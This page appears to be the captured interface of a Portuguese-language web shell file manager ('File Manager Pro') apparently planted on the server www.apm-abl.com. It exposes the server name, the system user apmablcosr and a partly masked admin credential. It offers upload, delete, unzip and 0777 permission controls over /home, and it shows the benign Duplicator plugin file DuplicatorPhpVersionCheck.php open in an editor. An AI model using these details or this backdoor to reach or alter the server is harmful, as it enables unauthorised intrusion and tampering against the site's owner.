🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_e446d8c0 / 8e9b****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: DuplicatorPhpVersionCheck.php
<?php /** * These functions are performed before including any other Duplicator file so * do not use any Duplicator library or feature and use code compatible with PHP 5.2 */ defined('ABSPATH') || exit; // In the future it will be included on both PRO and LITE so you need to check if the define exists. if (!class_exists('DuplicatorPhpVersionCheck')) { class DuplicatorPhpVersionCheck // phpcs:ignore { /** @var string */ protected static $minVer = ''; /** @var string */ protected static $suggestedVer = ''; /** * Check PhpVersin * * @param string $minVer min version of PHP * @param string $suggestedVer suggested version of PHP * * @return bool */ public static function check($minVer, $suggestedVer) { self::$minVer = $minVer; self::$suggestedVer = $suggestedVer; if (version_compare(PHP_VERSION, self::$minVer, '<')) { if (is_multisite()) { add_action('network_admin_notices', array(__CLASS__, 'notice')); } else { add_action('admin_notices', array(__CLASS__, 'notice')); } return false; } else { return true; } } /** * Display notice * * @return void */ public static function notice() { ?> <div class="error notice"> <p> <?php printf( __( 'DUPLICATOR: Your system is running a very old version of PHP (%s) that is no longer supported by Duplicator. ', 'duplicator' ), PHP_VERSION ); ?><br><br> <b> <?php printf( __( 'Please ask your host or server administrator to update to PHP %1s or greater.', 'duplicator' ), self::$suggestedVer ); ?></b><br> <?php printf( __( 'If this is not possible, please visit the FAQ link titled %1$s"What version of PHP Does Duplicator Support?"%2$s for instructions on how to download a previous version of Duplicator compatible with PHP %3$s.', 'duplicator' ), '<a href="' . esc_url('https://duplicator.com/knowledge-base/system-requirements') . '" target="blank">', '</a>', self::$minVer ); ?> </p> </div> <?php } } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar